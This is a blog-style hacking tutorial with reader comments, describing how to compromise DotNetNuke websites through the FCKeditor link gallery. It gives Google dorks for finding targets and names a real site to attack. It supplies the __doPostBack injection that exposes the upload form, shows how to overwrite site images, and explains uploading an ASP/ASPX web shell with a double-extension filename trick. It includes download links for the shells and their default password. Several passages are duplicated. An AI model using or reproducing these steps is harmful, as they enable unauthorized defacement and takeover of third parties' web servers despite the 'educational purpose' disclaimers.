[TUT]Hack Website Using DNN [Dot Net Nuke] Exploit WITH SHELL UPLOADING
Part 1
Note:- Only for educational purpose
Using google DORK try to find the vulnerable website.
inurl:"/portals/0"
OR
inurl:tabid/176/Default.aspx
OR
inurl:"Fck/fcklinkgallery.aspx" (for all the sites)
OR
inurl:"Fck/fcklinkgallery.aspx" site:{domain of site} (for specified attack)
Using google DORK try to find the vulnerable website.
inurl:"/portals/0"
OR
inurl:tabid/176/Default.aspx
OR
inurl:"Fck/fcklinkgallery.aspx" (for all the sites)
OR
inurl:"Fck/fcklinkgallery.aspx" site:{domain of site} (for specified attack)
You can also modify this google dork according to your need & requirement
I have found these 2 website vulnerable to this attack:
http://www.hancocksigns.com/
N00bs can also try both of these websites for testing purpose.
Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/
Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/
For e.g. in case of
http://www.hancocksigns.com/
http://www.hancocksigns.com/
.the image is located at location-
Waaooo it means this website is vulnerable and we can change the front page pic. Now the current image name is
hea2d.gif
Now here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
HOW TO RUN ?
Step 1
You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site)
Step 2
After selecting the third option, replace the URL bar with below script
javascript:__doPostBack('ctlURL$cmdUpload','')
javascript:__doPostBack('ctlURL$cmdUpload','')
After running this JAVA script, you will see like this
Know remember if theimage is directly in following format
Portals/0/xyz.jpg
Then just click on choose file and upload it….
But if it is other format like ours…our image is in following format
Portals/0/images/hea2d.gif
That mean the image is stored in image folders so just click on file location first and select images
And then put the script and then upload
Now remember if you want to change the image first name the image you want to upload with the uploaded image
For eg if I want to upload the image I will name it to hea2d.gif
And then upload it
Note:- we are doing this only for educational purpose…we don’t want to attack on any ones income source..so pls take the backup of the image you will be changing…so that after learning you can upload the original image back….thnks
Part II
Uploading the shell
In this part you will learn how to upload the shell so dat u can deface the site
Note:- only for educational purpose
All step are same till step 2..
Just download this shell n upload it
after uploading the shell. To open the shell open in this format
http://www.site.com/portals/0/jaguar.asp;me.jpg
you will see like this
For video TUT visit
http://www.youtube.com/watch?v=e9TZ-gXWLzI
Now comes the shell uploading part
All parts are the same...Just where you upload image upload the asp shell in shell.asp;me.jpg format
Shell link
http://www.mediafire.com/?0t1jmjmgnw2
So when the shell is uploaded your shell link will be something like this
www.site.com/portals/o/shell.asp.me.jpg
Another fun part download the apsxsyp shel from here
http://www.mediafire.com/?isjvjngsl9udu10
Upload this shell using the shell we uploaded first.. Now this shell link will be
www.site.com/portal/o/shell.aspx
http://www.youtube.com/watch?v=e9TZ-gXWLzI
Now comes the shell uploading part
All parts are the same...Just where you upload image upload the asp shell in shell.asp;me.jpg format
Shell link
http://www.mediafire.com/?0t1jmjmgnw2
So when the shell is uploaded your shell link will be something like this
www.site.com/portals/o/shell.asp.me.jpg
Another fun part download the apsxsyp shel from here
http://www.mediafire.com/?isjvjngsl9udu10
Upload this shell using the shell we uploaded first.. Now this shell link will be
www.site.com/portal/o/shell.aspx
Default password for shell is admin
About Admin
thnxxxx a lot av ..... dnn se shell upload kar sakte hai muje to malum hi nahi tha .. thnxxxx yaar ...
ReplyDeleteI found a site with a vulnerability where i can upload only .pdf and .doc files. I need a shell matching this need. Renaming the above shell to .pdf or .doc and uploading does not work. Where can i get a shell with .doc or .pdf extension?...please help
ReplyDeleteit all fake not work we can not load php filessssssssss
ReplyDelete"it all fake not work we can not load php filessssssssss"
ReplyDeleteYou can u jus have to use ur brain to upload jus upload ur shell in image format n upload ur php files
AV plz tell me why "javascript:__doPostBack('ctlURL$cmdUpload','') " doesnt work for me? i put it in url but it doesnt give me browse option. why is it so??
ReplyDelete@^^ Which browser are you using?
ReplyDeletem using mozilla
ReplyDelete@^^ then the site may be patched
ReplyDeleteafter uploading shell in jpg format when i tried to open it.. its some thng lok lyk a imag but shell doesnt runs why this was so?? ans plzz
ReplyDeleteshell link don't work Please Re Upload
ReplyDeleteThanks